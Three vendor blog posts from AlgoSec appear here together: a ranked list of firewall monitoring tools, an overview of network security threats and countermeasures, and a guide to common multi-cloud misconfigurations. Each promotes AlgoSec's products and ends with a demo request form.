Firewall monitoring is an important part of maintaining strict network security. Every firewall device has an important role to play... Firewall Policy Management 10 Best Firewall Monitoring Software for Network Security Asher Benbenisty 2 min read Asher Benbenisty Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 10/24/23 Published Firewall monitoring is an important part of maintaining strict network security. Every firewall device has an important role to play protecting the network, and unexpected flaws or downtime can put the entire network at risk. Firewall monitoring solutions provide much-needed visibility into the status and behavior of your network firewall setup. They make the security of your IT infrastructure observable, enabling you to efficiently deploy resources towards managing and securing traffic flows. This is especially important in environments with multiple firewall hardware providers, where you may need to verify firewalls, routers, load balancers, and more from a central interface. What is the role of Firewall Monitoring Software? Every firewall in your network is a checkpoint that verifies traffic according to your security policy. Firewall monitoring software assesses the performance and reports the status of each firewall in the network. This is important because a flawed or defective firewall can’t do its job properly. In a complex enterprise IT environment, dedicating valuable resources to manually verifying firewalls isn’t feasible. The organization may have hardware firewalls from Juniper or Cisco, software firewalls from Check Point, and additional built-in operating system firewalls included with Microsoft Windows. Manually verifying each one would be a costly and time-consuming workflow that prevents limited security talent from taking on more critical tasks. Additionally, admins would have to wait for individual results from each firewall in the network. In the meantime, the network would be exposed to vulnerabilities that exploit faulty firewall configurations. Firewall monitoring software solves this problem using automation . By compressing all the relevant data from every firewall in the network into a single interface, analysts and admins can immediately detect security threats that compromise firewall security. The Top 10 Firewall Monitoring Tools Right Now 1. AlgoSec AlgoSec enables security teams to visualize and manage complex hybrid networks . It uses a holistic approach to provide instant visibility to the entire network’s security configuration, including cloud and on-premises infrastructure. This provides a single pane of glass that lets security administrators preview policies before enacting them and troubleshoot issues in real-time. 2. Wireshark Wireshark is a widely used network protocol analyzer. It can capture and display the data traveling back and forth on a network in real-time. While it’s not a firewall-specific tool, it’s invaluable for diagnosing network issues and understanding traffic patterns. As an open-source tool, anyone can download WireShark for free and immediately start using it to analyze data packets. 3. PRTG Network Monitor PRTG is known for its user-friendly interface and comprehensive monitoring capabilities. It supports SNMP and other monitoring methods, making it suitable for firewall monitoring. Although it is an extensible and customizable solution, it requires purchasing a dedicated on-premises server. 4. SolarWinds Firewall Security Manager SolarWinds offers a suite of network management tools, and their Firewall Security Manager is specifically designed for firewall monitoring and management. It helps with firewall rule analysis, change management, and security policy optimization. It is a highly configurable enterprise technology that provides centralized incident management features. However, deploying SolarWinds can be complex, and the solution requires specific on-premises hardware to function. 5. FireMon FireMon is a firewall management and analysis platform. It provides real-time visibility into firewall rules and configurations, helping organizations ensure that their firewall policies are compliant and effective. FireMon minimizes security risks related to policy misconfigurations, extending policy management to include multiple security tools, including firewalls. 6. ManageEngine ManageEngine’s OpManager offers IT infrastructure management solutions, including firewall log analysis and reporting. It can help you track and analyze traffic patterns, detect anomalies, and generate compliance reports. It is intuitive and easy to use, but only supports monitoring devices across multiple networks with its higher-tier Enterprise Edition. It also requires the installation of on-premises hardware. 7. Tufin Tufin SecureTrack is a comprehensive firewall monitoring and management solution. It provides real-time monitoring, change tracking, and compliance reporting for firewalls and other network devices. It can automatically discover network assets and provide comprehensive information on network assets, but may require additional configuration to effectively monitor complex enterprise networks. 8. Cisco Firepower Management Center If you’re using Cisco firewalls, the Firepower Management Center offers centralized management and monitoring capabilities. It provides insights into network traffic, threats, and policy enforcement. Cisco simplifies network management and firewall monitoring by offering an intuitive centralized interface that lets admins control Cisco firewall devices directly. 9. Symantec Symantec (now part of Broadcom) offers firewall appliances with built-in monitoring and reporting features. These appliances are known for providing comprehensive coverage to endpoints like desktop workstations, laptops, and mobile devices. Symantec also provides some visibility into firewall configurations, but it is not a dedicated service built for this purpose. 10. Fortinet Fortinet’s FortiAnalyzer is designed to work with Fortinet’s FortiGate firewalls. It provides centralized logging, reporting, and analysis of network traffic and security events. This provides customers with end-to-end visibility into emerging threats on their networks and even includes useful security automation tools. It’s relatively easy to deploy, but integrating it with a complex set of firewalls may take some time. Benefits of Firewall Monitoring Software Enhanced Security Your firewalls are your first line of defense against cyberattacks, preventing malicious entities from infiltrating your network. Threat actors know this, and many sophisticated attacks start with attempts to disable firewalls or overload them with distributed denial of service (DDoS) attacks. Without a firewall monitoring solution in place, you may not be aware such an attack is happening until it’s too late. Even if your firewalls are successfully defending against the attack, your detection and response team should be ready to start mitigating risk the moment the attack is launched. Traffic Control Firewalls can add strain and latency to network traffic. This is especially true of software firewalls, which have to draw computing resources from the servers they protect. Over time, network congestion can become an expensive obstacle to growth, creating bottlenecks that reduce the efficiency of every device on the network. Improperly implemented firewalls can play a major role in these bottlenecks because they have to verify every data packet transferred through them. With firewall monitoring, system administrators can assess the impact of firewall performance on network traffic and use that data to more effectively balance network loads. Organizations can reduce overhead by rerouting data flows and finding low-cost storage options for data they don’t constantly need access to. Real-time Alerts If attackers manage to break through your defenses and disable your firewall, you will want to know immediately. Part of having a strong security posture is building a multi-layered security strategy. Your detection and response team will need real-time updates on the progress of active cyberattacks. They will use this information to free the resources necessary to protect the organization and mitigate risk. Organizations that don’t have real-time firewall monitoring in place won’t know if their firewalls fail against an ongoing attack. This can lead to a situation where the CSIRT team is forced to act without clear knowledge about what they’re facing. Performance Monitoring Poor network performance can have a profound impact on the profitability of an enterprise-sized organization. Drops in network quality cost organizations more than half a million dollars per year , on average. Misconfigured firewalls can contribute to poor network performance if left unaddressed while the organization grows and expands its network. Properly monitoring the performance of the network requires also monitoring the performance of the firewalls that protect it. System administrators should know if overly restrictive firewall policies prevent legitimate users from accessing the data they need. Policy Enforcement Firewall monitoring helps ensure security policies are implemented and enforced in a standardized way throughout the organization. They can help discover the threat of shadow IT networks made by users communicating outside company-approved devices and applications. This helps prevent costly security breaches caused by negligence. Advanced firewall monitoring solutions can also help security leaders create, save, and update policies using templates. The best of these solutions enable security teams to preview policy changes and research elaborate “what-if” scenarios, and update their core templates accordingly. Selecting the Right Network Monitoring Software When considering a firewall monitoring service, enterprise security leaders should evaluate their choice based on the following features: Scalability Ensure the software can grow with your network to accommodate future needs. Ideally, both your firewall setup and the monitoring service responsible for it can grow at the same pace as your organization. Pay close attention to the way the organization itself is likely to grow over time. A large government agency may require a different approach to scalability than an acquisition-oriented enterprise with many separate businesses under its umbrella. Customizability Look for software that allows you to tailor security rules to your specific requirements. Every organization is unique. The appropriate firewall configuration for your organization may be completely different than the one your closest competitor needs. Copying configurations and templates between organizations won’t always work. Your network monitoring solution should be able to deliver performance insights fine-tuned to your organization’s real needs. If there are gaps in your monitoring capabilities, there are probably going to be gaps in your security posture as well. Integration Compatibility with your existing network infrastructure is essential for seamless operation. This is another area where every organization is unique. It’s very rare for two organizations to use the same hardware and software tools, and even then there may be process-related differences that can become obstacles to easy integration. Your organization’s ideal firewall monitoring solution should provide built-in support for the majority of the security tools the organization uses. If there are additional tools or services that aren’t supported, you should feel comfortable with the process of creating a custom integration without too much difficulty. Reporting Comprehensive reporting features provide insights into network activity and threats. It should generate reports that fit the formats your analysts are used to working with. If the learning curve for adopting a new technology is too high, achieving buy-in will be difficult. The best network monitoring solutions provide a wide range of reports into every aspect of network and firewall performance. Observability is one of the main drivers of value in this kind of implementation, and security leaders have no reason to accept compromises here. AlgoSec for Real-time Network Traffic Analysis Real-time network traffic monitoring reduces security risks and enables faster, more significant performance improvements at enterprise scale. Security professionals and network engineers need access to clear, high-quality insight on data flows and network performance, and AlgoSec delivers. One way AlgoSec deepens the value of network monitoring is through the ability to connect applications directly to security policy rules . When combined with real-time alerts, this provides deep visibility into the entire network while reducing the need to conduct time-consuming manual queries when suspicious behaviors or sub-optimal traffic flows are detected. Firewall Monitoring Software: FAQs How Does Firewall Monitoring Software Work? These software solutions manage firewalls so they can identify malicious traffic flows more effectively. They connect multiple hardware and software firewalls to one another through a centralized interface. Administrators can gather information on firewall performance, preview or change policies, and generate comprehensive reports directly. This enables firewalls to detect more sophisticated malware threats without requiring the deployment of additional hardware. How often should I update my firewall monitoring software? Regular updates are vital to stay protected against evolving threats. When your firewall vendor releases an update, it often includes critical security data on the latest emerging threats as well as patches for known vulnerabilities. Without these updates, your firewalls may become vulnerable to exploits that are otherwise entirely preventable. The same is true for all software, but it’s especially important for firewalls. Can firewall monitoring software prevent all cyberattacks? While highly effective, no single security solution is infallible. Organizations should focus on combining firewall monitoring software with other security measures to create a multi-layered security posture. If threat actors successfully disable or bypass your firewalls, your detection and response team should receive a real-time notification and immediately begin mitigating cyberattack risk. Is open-source firewall monitoring software a good choice? Open-source options can be cost-effective, but they may require more technical expertise to configure and maintain. This is especially true for firewall deployments that rely on highly customized configurations. Open-source architecture can make sense in some cases, but may present challenges to scalability and the affordability of hiring specialist talent later on. How do I ensure my firewall doesn’t block legitimate traffic? Regularly review and adjust your firewall rules to avoid false positives. Sophisticated firewall solutions include features for reducing false positives, while simpler firewalls are often unable to distinguish genuine traffic from malicious traffic. Advanced firewall monitoring services can help you optimize your firewall deployment to reduce false positives without compromising security. How does firewall monitoring enhance overall network security? Firewalls can address many security threats, from distributed denial of service (DDoS) attacks to highly technical cross-site scripting attacks. The most sophisticated firewalls can even block credential-based attacks by examining outgoing content for signs of data exfiltration. Firewall monitoring allows security leaders to see these processes in action and collect data on them, paving the way towards continuous security improvement and compliance. What is the role of VPN audits in network security? Advanced firewalls are capable of identifying VPN connections and enforcing rules specific to VPN traffic. However, firewalls are not generally capable of decrypting VPN traffic, which means they must look for evidence of malicious behavior outside the data packet itself. Firewall monitoring tools can audit VPN connections to determine if they are harmless or malicious in nature, and enforce rules for protecting enterprise assets against cybercriminals equipped with secure VPNs . What are network device management best practices? Centralizing the management of network devices is the best way to ensure optimal network performance in a rapid, precise way. Organizations that neglect to centralize firewall and network device management have to manually interact with increasingly complex fleets of network hardware, software applications, and endpoint devices. This makes it incredibly difficult to make changes when needed, and increases the risks associated with poor change management when they happen. What are the metrics and notifications that matter most for firewall monitoring? Some of the important parameters to pay attention to include the volume of connections from new or unknown IP addresses, the amount of bandwidth used by the organization’s firewalls, and the number of active sessions on at any given time. Port information is especially relevant because so many firewall rules specify actions based on the destination port of incoming traffic. Additionally, network administrators will want to know how quickly they receive notifications about firewall issues and how long it takes to resolve those issues. What is the role of bandwidth and vulnerability monitoring? Bandwidth monitoring allows system administrators to find out which users and hosts consume the most bandwidth, and how network bandwidth is shared among various protocols. This helps track network performance and provides visibility into security threats that exploit bandwidth issues. Denial of service (DoS) attacks are a common cyberattack that weaponizes network bandwidth. What’s the difference between on-premises vs. cloud-based firewall monitoring? Cloud-based firewall monitoring uses software applications deployed as cloud-enabled services while on-premises solutions are physical hardware solutions. Physical solutions must be manually connected to every device on the network, while cloud-based firewall monitoring solutions can automatically discover assets and IT infrastructure immediately after being deployed. What is the role of configuration management? Updating firewall configurations is an important part of maintaining a resilient security posture. Organizations that fail to systematically execute configuration changes on all assets on the network run the risk of forgetting updates or losing track of complex policies and rules. Automated firewall monitoring solutions allow admins to manage configurations more effectively while optimizing change management. What are some best practices for troubleshooting network issues? Monitoring tools offer much-needed visibility to IT professionals who need to address network problems. These tools help IT teams narrow down the potential issues and focus their time and effort on the most likely issues first. Simple Network Management Protocol (SNMP) monitoring uses a client-server application model to collect information running on network devices. This provides comprehensive data about network devices and allows for automatic discovery of assets on the network. What’s the role of firewall monitoring in Windows environments? Microsoft Windows includes simple firewall functionality in its operating system platform, but it is best-suited to personal use cases on individual endpoints. Organizations need a more robust solution for configuring and enforcing strict security rules, and a more comprehensive way to monitor Windows-based networks as a whole. Platforms like AlgoSec help provide in-depth visibility into the security posture of Windows environments. How do firewall monitoring tools integrate with cloud services? Firewall monitoring tools provide observability to cloud-based storage and computing services like AWS and Azure. Cloud-native monitoring solutions can ingest network traffic coming to and from public cloud providers and make that data available for security analysts. Enterprise security teams achieve this by leveraging APIs to automate the transfer of network performance data from the cloud provider’s infrastructure to their own monitoring platform. What are some common security threats and cyberattacks that firewalls can help mitigate? Since firewalls inspect every packet of data traveling through the network perimeter, they play a critical role detecting and mitigating many different threats and attacks. Simple firewalls can block unsophisticated denial-of-service (DoS) attacks and detect known malware variants. Next-generation firewalls can prevent data breaches by conducting deep packet analysis, identifying compromised applications and user accounts, and even blocking sensitive data from leaving the network altogether. What is the importance of network segmentation and IP address management? Network segmentation protects organizations from catastrophic data breaches by ensuring that even successful cyberattacks are limited in scope. If attackers compromise one part of the network, they will not necessarily have access to every other part. Security teams achieve segmentation in part by effectively managing network IP addresses according to a robust security policy and verifying the effects of policy changes using monitoring software. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Modern organizations face a wide and constantly changing range of network security threats, and security leaders must constantly update... Network Security Network Security Threats & Solutions for Cybersecurity Leaders Tsippi Dach 2 min read Tsippi Dach Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 2/11/24 Published Modern organizations face a wide and constantly changing range of network security threats, and security leaders must constantly update their security posture against them. As threat actors change their tactics, techniques, and procedures, exploit new vulnerabilities , and deploy new technologies to support their activities — it’s up to security teams to respond by equipping themselves with solutions that address the latest threats. The arms race between cybersecurity professionals and cybercriminals is ongoing. During the COVID-19 pandemic, high-profile ransomware attacks took the industry by storm. When enterprise security teams responded by implementing secure backup functionality and endpoint detection and response, cybercriminals shifted towards double extortion attacks. The cybercrime industry constantly invests in new capabilities to help hackers breach computer networks and gain access to sensitive data. Security professionals must familiarize themselves with the latest network security threats and deploy modern solutions that address them. What are the Biggest Network Security Threats? 1. Malware-based Cyberattacks Malware deserves a category of its own because so many high-profile attacks rely on malicious software to work. These include everything from the Colonial Pipeline Ransomware attack to historical events like Stuxnet . Broadly speaking, cyberattacks that rely on launching malicious software on computer systems are part of this category. There are many different types of malware-based cyberattacks, and they vary widely in scope and capability. Some examples include: Viruses. Malware that replicates itself by inserting its own code into other applications are called viruses. They can spread across devices and networks very quickly. Ransomware. This type of malware focuses on finding and encrypting critical data on the victim’s network and then demanding payment for the decryption key. Cybercriminals typically demand payment in the form of cryptocurrency, and have developed a sophisticated industrial ecosystem for conducting ransomware attacks. Spyware. This category includes malware variants designed to gather information on victims and send it to a third party without your consent. Sometimes cybercriminals do this as part of a more elaborate cyberattack. Other times it’s part of a corporate espionage plan. Some spyware variants collect sensitive information that cybercriminals value highly. Trojans. These are malicious applications disguised as legitimate applications. Hackers may hide malicious code inside legitimate software in order to trick users into becoming victims of the attack. Trojans are commonly hidden as an email attachment or free-to-download file that launches its malicious payload after being opened in the victim’s environment. Fileless Malware. This type of malware leverages legitimate tools native to the IT environment to launch an attack. This technique is also called “living off the land” because hackers can exploit applications and operating systems from inside, without having to download additional payloads and get them past firewalls. 2. Network-Based Attacks These are attacks that try to impact network assets or functionality, often through technical exploitations. Network-based attacks typically start at the edge of the network, where it sends and receives traffic to the public internet. Distributed Denial-of-Service (DDoS) Attacks. These attacks overwhelm network resources, leading to downtime and service unavailability, and in some cases, data loss . To launch DDoS attacks, cybercriminals must gain control over a large number of compromised devices and turn them into bots. Once thousands (or millions) of bots using unique IP addresses request server resources, the server breaks down and stops functioning. Man-in-the-Middle (MitM) Attacks: These attacks let cybercriminals eavesdrop on communications between two parties. In some cases, they can also alter the communications between both parties, allowing them to plan and execute more complex attacks. Many different types of man-in-the-middle attacks exist, including IP spoofing, DNS spoofing, SSL stripping, and others. 3. Social Engineering and Phishing These attacks are not necessarily technical exploits. They focus more on abusing the trust that human beings have in one another. Usually, they involve the attacker impersonating someone in order to convince the victim to give up sensitive data or grant access to a secure asset. Phishing Attacks. This is when hackers create fake messages telling victims to take some kind of action beneficial to the attacker. These deceptive messages can result in the theft of login credentials, credit card information, or more. Most major institutions are regularly impersonated by hackers running phishing scams, like the IRS . Social Engineering Attacks. These attacks use psychological manipulation to trick victims into divulging confidential information. A common example might be a hacker contacting a company posing as a third-party technology vendor, asking for access to a secure system, or impersonating the company CEO and demanding an employee pay a fictitious invoice. 4. Insider Threats and Unauthorized Access These network security threats are particularly dangerous because they are very difficult to catch. Most traditional security tools are not configured to detect malicious insiders, who generally have permission to access sensitive data and assets. Insider Threats. Employees, associates, and partners with access to sensitive data may represent severe security risks. If an authorized user decides to steal data and sell it to a hacker or competitor, you may not be able to detect their attack using traditional security tools. That’s what makes insider threats so dangerous, because they are often undetectable. Unauthorized Access. This includes a broad range of methods used to gain illegal access to networks or systems. The goal is usually to steal data or alter it in some way. Attackers may use credential-stuffing attacks to access sensitive networks, or they can try brute force methods that involve automatically testing millions of username and password combinations until they get the right one. This often works because people reuse passwords that are easy to remember. Solutions to Network Security Threats Each of the security threats listed above comes with a unique set of risks, and impacts organizations in a unique way. There is no one-size-fits-all solution to navigating these risks. Every organization has to develop a cybersecurity policy that meets its specific needs. However, the most secure organizations usually share the following characteristics. Fundamental Security Measures Well-configured Firewalls. Firewalls control incoming and outgoing network traffic based on security rules. These rules can deny unauthorized traffic attempting to connect with sensitive network assets and block sensitive information from traveling outside the network. In each case, robust configuration is key to making the most of your firewall deployment . Choosing a firewall security solution like AlgoSec can dramatically improve your defenses against complex network threats. Anti-malware and Antivirus Software. These solutions detect and remove malicious software throughout the network. They run continuously, adapting their automated scans to include the latest threat detection signatures so they can block malicious activity before it leads to business disruption. Since these tools typically rely on threat signatures, they cannot catch zero-day attacks that leverage unknown vulnerabilities. Advanced Protection Tools Intrusion Prevention Systems. These security tools monitor network traffic for behavior that suggests unauthorized activity. When they find evidence of cyberattacks and security breaches, they launch automated responses that block malicious activity and remove unauthorized users from the network. Network Segmentation. This is the process of dividing networks into smaller segments to control access and reduce the attack surface. Highly segmented networks are harder to compromise because hackers have to repeatedly pass authentication checks to move from one network zone to another. This increases the chance that they fail, or generate activity unusual enough to trigger an alert. Security and Information Event Management (SIEM) platforms. These solutions give security analysts complete visibility into network and application activity across the IT environment. They capture and analyze log data from firewalls, endpoint devices, and other assets and correlate them together so that security teams can quickly detect and respond to unauthorized activity, especially insider threats. Endpoint Detection and Response (EDR). These solutions provide real-time visibility into the activities of endpoint devices like laptops, desktops, and mobile phones. They monitor these devices for threat indicators and automatically respond to identified threats before they can reach the rest of the network. More advanced Extended Detection and Response (XDR) solutions draw additional context and data from third party security tools and provide in-depth automation . Authentication and Access Control Multi-Factor Authentication (MFA). This technology enhances security by requiring users to submit multiple forms of verification before accessing sensitive data. This makes it useful against phishing attacks, social engineering, and insider threats, because hackers need more than just a password to gain entry to secure networks. MFA also plays an important role in Zero Trust architecture. Strong Passwords and Access Policies. There is no replacement for strong password policies and securely controlling user access to sensitive data. Security teams should pay close attention to password policy compliance, making sure employees do not reuse passwords across accounts and avoid simple memory hacks like adding sequential numbers to existing passwords. Preventing Social Engineering and Phishing While SIEM platforms, MFA policies and strong passwords go a long way towards preventing social engineering and phishing attacks, there are a few additional security measures worth taking to reduce these risks: Security Awareness Training. Leverage a corporate training LMS to educate employees about phishing and social engineering tactics. Phishing simulation exercises can help teach employees how to distinguish phishing messages from legitimate ones, and pinpoint the users at highest risk of falling for a phishing scam. Email Filtering and Verification: Email security tools can identify and block phishing emails before they arrive in the inbox. They often rely on scanning the reputation of servers that send incoming emails, and can detect discrepancies in email metadata that suggest malicious intent. Even if these solutions generally can’t keep 100% of malicious emails out of the inbox, they significantly reduce email-related threat risks. Dealing with DDoS and MitM Attacks These technical exploits can lead to significant business disruption, especially when undertaken by large-scale threat actors with access to significant resources. Your firewall configuration and VPN policies will make the biggest difference here: DDoS Prevention Systems. Protect against distributed denial of service attacks by implementing third-party DDoS prevention solutions, deploying advanced firewall configurations, and using load balancers. Some next generation firewalls (NGFWs) can increase protection against DDoS attacks by acting as a handshake proxy and dropping connection requests that do not complete the TCP handshake process. VPNs and Encryption: VPNs provide secure communication channels that prevent MitM attacks and data eavesdropping. Encrypted traffic can only be intercepted by attackers who go through the extra step of obtaining the appropriate decryption key. This makes it much less likely they focus on your organization instead of less secure ones that are easier to target. Addressing Insider Threats Insider threats are a complex security issue that require deep, multi-layered solutions to address. This is especially true when malicious insiders are actually employees with legitimate user credentials and privileges. Behavioral Auditing and Monitoring: Regular assessments and monitoring of user activities and network traffic are vital for detecting insider threats . Security teams need to look beyond traditional security deployments and gain insight into user behaviors in order to catch authorized users doing suspicious things like escalating their privileges or accessing sensitive data they do not normally access. Zero Trust Security Model. Assume no user or device is trustworthy until verified. Multiple layers of verification between highly segmented networks — with multi-factor authentication steps at each layer — can make it much harder for insider threats to steal data and conduct cyberattacks. Implementing a Robust Security Strategy Directly addressing known threats should be just one part of your cybersecurity strategy. To fully protect your network and assets from unknown risks, you must also implement a strong security posture that can address risks associated with new and emerging cyber threats. Continual Assessment and Improvement The security threat landscape is constantly changing, and your security posture must adapt and change in response. It’s not always easy to determine exactly how your security posture should change, which is why forward-thinking security leaders periodically invest in vulnerability assessments designed to identify security vulnerabilities that may have been overlooked. Once you have a list of security weaknesses you need to address, you can begin the process of proactively addressing them by configuring your security tech stack and developing new incident response playbooks. These playbooks will help you establish a coordinated, standardized response to security incidents and data breaches before they occur. Integration of Security Tools Coordinating incident response plans isn’t easy when every tool in your tech stack has its own user interface and access control permissions. You may need to integrate your security tools into a single platform that allows security teams to address issues across your entire network from a single point of reference. This will help you isolate and address security issues on IoT devices and mobile devices without having to dedicate a particular team member exclusively to that responsibility. If a cyberattack that targets mobile apps occurs, your incident response plan won’t be limited by the bottleneck of having a single person with sufficient access to address it. Similarly, highly integrated security tools that leverage machine learning and automation can enhance the scalability of incident response and speed up incident response processes significantly. Certain incident response playbooks can be automated entirely, providing near-real-time protection against sophisticated threats and freeing your team to focus on higher-impact strategic initiatives. Developing and Enforcing Security Policies Developing and enforcing security policies is one of the high-impact strategic tasks your security team should dedicate a great deal of time and effort towards. Since the cybersecurity threat landscape is constantly changing, you must commit to adapting your policies in response to new and emerging threats quickly. That means developing a security policy framework that covers all aspects of network and data security. Similarly, you can pursue compliance with regulatory standards that ensure predictable outcomes from security incidents. Achieving compliance with standards like NIST, CMMC, PCI-DSS, and HIPPA can help you earn customers’ trust and open up new business opportunities. AlgoSec: Your Partner in Network Security Protecting against network threats requires continuous vigilance and the ability to adapt to fast-moving changes in the security landscape. Every level of your organization must be engaged in security awareness and empowered to report potential security incidents. Policy management and visibility platforms like AlgoSec can help you gain control over your security tool configurations. This enhances the value of continuous vigilance and improvement, and boosts the speed and accuracy of policy updates using automation. Consider making AlgoSec your preferred security policy automation and visibility platform. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

Top 5 misconfigurations to avoid for robust security Multi-cloud environments have become the backbone of modern enterprise IT, offering unparalleled flexibility, scalability, and access to a diverse array of innovative services. This distributed architecture empowers organizations to avoid vendor lock-in, optimize costs, and leverage specialized functionalities from different providers. However, this very strength introduces a significant challenge: increased complexity in security... Cloud Security 5 Multi-Cloud Environments Iris Stein 2 min read Iris Stein Short bio about author here Lorem ipsum dolor sit amet consectetur. Vitae donec tincidunt elementum quam laoreet duis sit enim. Duis mattis velit sit leo diam. Tags Share this article 6/23/25 Published Top 5 misconfigurations to avoid for robust security Multi-cloud environments have become the backbone of modern enterprise IT, offering unparalleled flexibility, scalability, and access to a diverse array of innovative services. This distributed architecture empowers organizations to avoid vendor lock-in, optimize costs, and leverage specialized functionalities from different providers. However, this very strength introduces a significant challenge: increased complexity in security management. The diverse security models, APIs, and configuration nuances of each cloud provider, when combined, create a fertile ground for misconfigurations. A single oversight can cascade into severe security vulnerabilities, lead to compliance violations, and even result in costly downtime and reputational damage. At AlgoSec, we have extensive experience in navigating the intricacies of multi-cloud security. Our observations reveal recurring patterns of misconfigurations that undermine even the most well-intentioned security strategies. To help you fortify your multi-cloud defences, we've compiled the top five multi-cloud misconfigurations that organizations absolutely must avoid. 1. Over-permissive policies: The gateway to unauthorized access One of the most pervasive and dangerous misconfigurations is the granting of overly broad or permissive access policies. In the rush to deploy applications or enable collaboration, it's common for organizations to assign excessive permissions to users, services, or applications. This "everyone can do everything" approach creates a vast attack surface, making it alarmingly easy for unauthorized individuals or compromised credentials to gain access to sensitive resources across your various cloud environments. The principle of least privilege (PoLP) is paramount here. Every user, application, and service should only be granted the minimum necessary permissions to perform its intended function. This includes granular control over network access, data manipulation, and resource management. Regularly review and audit your Identity and Access Management (IAM) policies across all your cloud providers. Tools that offer centralized visibility into entitlements and highlight deviations can be invaluable in identifying and rectifying these critical vulnerabilities before they are exploited. 2. Inadequate network segmentation: Lateral movement made easy In a multi-cloud environment, a flat network architecture is an open invitation for attackers. Without proper network segmentation, a breach in one part of your cloud infrastructure can easily lead to lateral movement across your entire environment. Mixing production, development, and sensitive data workloads within the same network segment significantly increases the risk of an attacker pivoting from a less secure development environment to a critical production database. Effective network segmentation involves logically isolating different environments, applications, and data sets. This can be achieved through Virtual Private Clouds (VPCs), subnets, security groups, network access control lists (NACLs), and micro-segmentation techniques. The goal is to create granular perimeters around critical assets, limiting the blast radius of any potential breach. By restricting traffic flows between different segments and enforcing strict ingress and egress rules, you can significantly hinder an attacker's ability to move freely within your cloud estate. 3. Unsecured storage buckets: A goldmine for data breaches Cloud storage services, such as Amazon S3, Azure Blob Storage, and Google Cloud Storage, offer incredible scalability and accessibility. However, their misconfiguration remains a leading cause of data breaches. Publicly accessible storage buckets, often configured inadvertently, expose vast amounts of sensitive data to the internet. This includes customer information, proprietary code, intellectual property, and even internal credentials. It is imperative to always double-check and regularly audit the access controls and encryption settings of all your storage buckets across every cloud provider. Implement strong bucket policies, restrict public access by default, and enforce encryption at rest and in transit. Consider using multifactor authentication for access to storage, and leverage tools that continuously monitor for publicly exposed buckets and alert you to any misconfigurations. Regular data classification and tagging can also help in identifying and prioritizing the protection of highly sensitive data stored in the cloud. 4. Lack of centralized visibility: Flying blind in a complex landscape Managing security in a multi-cloud environment without a unified, centralized view of your security posture is akin to flying blind. The disparate dashboards, logs, and security tools provided by individual cloud providers make it incredibly challenging to gain a holistic understanding of your security landscape. This fragmented visibility makes it nearly impossible to identify widespread misconfigurations, enforce consistent security policies across different clouds, and respond effectively and swiftly to emerging threats. A centralized security management platform is crucial for multi-cloud environments. Such a platform should provide comprehensive discovery of all your cloud assets, enable continuous risk assessment, and offer unified policy management across your entire multi-cloud estate. This centralized view allows security teams to identify inconsistencies, track changes, and ensure that security policies are applied uniformly, regardless of the underlying cloud provider. Without this overarching perspective, organizations are perpetually playing catch-up, reacting to incidents rather than proactively preventing them. 5. Neglecting Shadow IT: The unseen security gaps Shadow IT refers to unsanctioned cloud deployments, applications, or services that are used within an organization without the knowledge or approval of the IT or security departments. While seemingly innocuous, shadow IT can introduce significant and often unmanaged security gaps. These unauthorized resources often lack proper security configurations, patching, and monitoring, making them easy targets for attackers. To mitigate the risks of shadow IT, organizations need robust discovery mechanisms that can identify all cloud resources, whether sanctioned or not. Once discovered, these resources must be brought under proper security governance, including regular monitoring, configuration management, and adherence to organizational security policies. Implementing cloud access security brokers (CASBs) and network traffic analysis tools can help in identifying and gaining control over shadow IT instances. Educating employees about the risks of unauthorized cloud usage is also a vital step in fostering a more secure multi-cloud environment. Proactive management with AlgoSec Cloud Enterprise Navigating the complex and ever-evolving multi-cloud landscape demands more than just awareness of these pitfalls; it requires deep visibility and proactive management. This is precisely where AlgoSec Cloud Enterprise excels. Our solution provides comprehensive discovery of all your cloud assets across various providers, offering a unified view of your entire multi-cloud estate. It enables continuous risk assessment by identifying misconfigurations, policy violations, and potential vulnerabilities. Furthermore, AlgoSec Cloud Enterprise empowers automated policy enforcement, ensuring consistent security postures and helping you eliminate misconfigurations before they can be exploited. By providing this robust framework for security management, AlgoSec helps organizations maintain a strong and resilient security posture in their multi-cloud journey. Stay secure out there! The multi-cloud journey offers immense opportunities, but only with diligent attention to security and proactive management can you truly unlock its full potential while safeguarding your critical assets. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call